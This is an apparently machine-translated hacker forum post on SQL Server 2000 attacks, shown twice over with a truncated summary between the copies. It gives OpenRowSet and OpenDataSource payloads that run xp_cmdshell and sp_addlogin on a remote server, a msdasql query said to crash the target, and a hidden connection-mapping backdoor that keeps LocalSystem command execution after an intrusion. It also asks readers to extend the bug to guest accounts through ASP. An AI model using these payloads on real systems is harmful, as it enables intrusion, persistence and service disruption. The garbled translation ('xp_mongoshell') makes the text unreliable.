Next, I want to talk about some new sqlserver bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive. I will ask you to identify them.
1. About OpenRowSet and OpenDataSource
Maybe this technique has already been used, that is, to use OpenRowSet to send local commands. Generally, our usage is (including the msdn columns) as follows:
Select * From OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'select * From table ')
Visible (even literally) OpenRowSet is only used as a fast remote database access. It must be followed by select, that is, A recordset must be returned.
So can we use it to call xp_mongoshell? The answer is yes!
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'set fmtonly off
Exec master. DBO. xp_mongoshel l ''dir C :/''')
Set fmtonly off must be added to prevent the default setting of only returned column information. In this way, the output set returned by xp_cmdshell is submitted to the previous SELECT statement. If the default setting is used, if an empty set is returned, the SELECT statement fails and the command cannot be executed.
So if we want to call sp_addlogin, it will not return any set like xp_cmdshell, so we can no longer rely on fmtonly settings. You can perform the following operations:
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''
Exec master. DBO. sp_addlogin hectic ')
In this way, the command will return at least select OK! ', Your machine Chamber of Commerce shows OK !, At the same time, the other database will also add a hectic account, that is, we use select 'OK! The returned set of 'spoofed the local select request. It means that the command can be executed normally. You can also perform this operation using SP_ADDSRVROLEMEMBER and OpenDataSource! As for the real use of this method, let's take a look.
2. msdasql two requests
I wonder if you have tried to connect to a remote database using msdasql. Of course, this API must be called by the SQL server administrator, as shown below:
Select * From OpenRowSet ('msdasql ', 'driver = {SQL Server}; server = server; address = server, 1433; uid = sa; Pwd =; database = master; network = dbmssocn ','s
Elect * From Table1 select * From Table2 ')
When the number of fields in Table 1 and Table 2 is different, you will find that the of the other party crashes and local connection fails, and the system resource usage is normal. after killing the sqlserver process with pskill, if you do not restart the machine, sqlserver can either fail to start normally or often encounter illegal operations. I just happened to find this bug. I have not found the specific cause yet, it is strange that this phenomenon only occurs on msdasql, and sqloledb does not. It seems that the problem is not that the number of request sets does not match the number of returned sets, it should be the problem of msdasql. Let's take a closer look at the specific cause.
3. Terrible Backdoor
In the past, it was said on the Internet that webshells can be added to sqlserver by adding triger, jobs, or rewriting sp_addlogin and SP_ADDSRVROLEMEMBER. These methods are feasible, but they are easy to be discovered. I wonder if you have thought about the local connection ing of sqloledb. For example, you can use the Administrator account of sqlserver to execute the following command on the opposite sqlserver:
Select * From OpenRowSet ('sqloledb', 'trusted _ connection = yes; Data Source = hectic ', 'set fmtonly off exec master .. xp_cmdshell ''dir C :/''')
In this way, a local connection ing named hectic is established on the of the other party. As long as sqlserver is not restarted, The ing will continue to exist, at least I still don't know how to find the connection ing put by others. Well, after running the above command, you will find that even if sqlserver is a guest user without any permissions, you can also run the preceding command! And the permission is LocalSystem! (Default installation) haha! This method can be used to leave a backdoor on sqlserver, which has been intruded into and obtained administrator permissions. The above method is passed on sqlserver2000 sqlserver2000sp1!
There is another guess. Do you know whether you have noticed the two DSN attached to Windows by default? One is localserver and the other is msqi. When the two are created, the local administrator account is used to connect to sqlserver, if the of the other party is started through a custom power user, the SA permission is the same as that of the power user, and it is difficult to make a difference, but we use the following command:
Select * From OpenRowSet
('Msdasql ', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off Exec
Master .. xp_mongoshell ''dir C :/''')
You should be able to use the Administrator account of localserver to connect to the local sqlserver and then execute local commands with the permissions of this account. After that, I thought I should be able to break through the SA's power user permissions. The problem is that sqloledb cannot call the DSN connection, while msdasql is not called by the Administrator. Therefore, I am looking for a guest method to call msdasql.
If someone knows how to break through the bug or has a new idea, we can discuss it together. If the bug can be successfully used by guest, it will be a very serious security vulnerability. Because any SQL statement we mentioned above can be submitted to the other party's ASP for execution.
Next, I want to talk about some new sqlserver bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive. I will ask you to identify them. 1. You may have learned this technique about OpenRowSet and OpenDataSource, that is, using OpenRowSet to send local commands. Generally, our usage is (including msdn columns) as follows...
Next, I want to talk about some new sqlserver bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive. I will ask you to identify them.
1. About OpenRowSet and OpenDataSource
Maybe this technique has already been used, that is, to use OpenRowSet to send local commands. Generally, our usage is (including the msdn columns) as follows:
Select * From OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'select * From table ')
Visible (even literally) OpenRowSet is only used as a fast remote database access. It must be followed by select, that is, A recordset must be returned.
So can we use it to call xp_mongoshell? The answer is yes!
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'set fmtonly off
Exec master. DBO. xp_mongoshel l ''dir C :/''')
Set fmtonly off must be added to prevent the default setting of only returned column information. In this way, the output set returned by xp_cmdshell is submitted to the previous SELECT statement. If the default setting is used, if an empty set is returned, the SELECT statement fails and the command cannot be executed.
So if we want to call sp_addlogin, it will not return any set like xp_cmdshell, so we can no longer rely on fmtonly settings. You can perform the following operations:
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''
Exec master. DBO. sp_addlogin hectic ')
In this way, the command will return at least select OK! ', Your machine Chamber of Commerce shows OK !, At the same time, the other database will also add a hectic account, that is, we use select 'OK! The returned set of 'spoofed the local select request. It means that the command can be executed normally. You can also perform this operation using SP_ADDSRVROLEMEMBER and OpenDataSource! As for the real use of this method, let's take a look.
2. msdasql two requests
I wonder if you have tried to connect to a remote database using msdasql. Of course, this API must be called by the SQL server administrator, as shown below:
Select * From OpenRowSet ('msdasql ', 'driver = {SQL Server}; server = server; address = server, 1433; uid = sa; Pwd =; database = master; network = dbmssocn ','s
Elect * From Table1 select * From Table2 ')
When the number of fields in Table 1 and Table 2 is different, you will find that the of the other party crashes and local connection fails, and the system resource usage is normal. after killing the sqlserver process with pskill, if you do not restart the machine, sqlserver can either fail to start normally or often encounter illegal operations. I just happened to find this bug. I have not found the specific cause yet, it is strange that this phenomenon only occurs on msdasql, and sqloledb does not. It seems that the problem is not that the number of request sets does not match the number of returned sets, it should be the problem of msdasql. Let's take a closer look at the specific cause.
3. Terrible Backdoor
In the past, it was said on the Internet that webshells can be added to sqlserver by adding triger, jobs, or rewriting sp_addlogin and SP_ADDSRVROLEMEMBER. These methods are feasible, but they are easy to be discovered. I wonder if you have thought about the local connection ing of sqloledb. For example, you can use the Administrator account of sqlserver to execute the following command on the opposite sqlserver:
Select * From OpenRowSet ('sqloledb', 'trusted _ connection = yes; Data Source = hectic ', 'set fmtonly off exec master .. xp_cmdshell ''dir C :/''')
In this way, a local connection ing named hectic is established on the of the other party. As long as sqlserver is not restarted, The ing will continue to exist, at least I still don't know how to find the connection ing put by others. Well, after running the above command, you will find that even if sqlserver is a guest user without any permissions, you can also run the preceding command! And the permission is LocalSystem! (Default installation) haha! This method can be used to leave a backdoor on sqlserver, which has been intruded into and obtained administrator permissions. The above method is passed on sqlserver2000 sqlserver2000sp1!
There is another guess. Do you know whether you have noticed the two DSN attached to Windows by default? One is localserver and the other is msqi. When the two are created, the local administrator account is used to connect to sqlserver, if the of the other party is started through a custom power user, the SA permission is the same as that of the power user, and it is difficult to make a difference, but we use the following command:
Select * From OpenRowSet
('Msdasql ', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off Exec
Master .. xp_mongoshell ''dir C :/''')
You should be able to use the Administrator account of localserver to connect to the local sqlserver and then execute local commands with the permissions of this account. After that, I thought I should be able to break through the SA's power user permissions. The problem is that sqloledb cannot call the DSN connection, while msdasql is not called by the Administrator. Therefore, I am looking for a guest method to call msdasql.
If someone knows how to break through the bug or has a new idea, we can discuss it together. If the bug can be successfully used by guest, it will be a very serious security vulnerability. Because any SQL statement we mentioned above can be submitted to the other party's ASP for execution.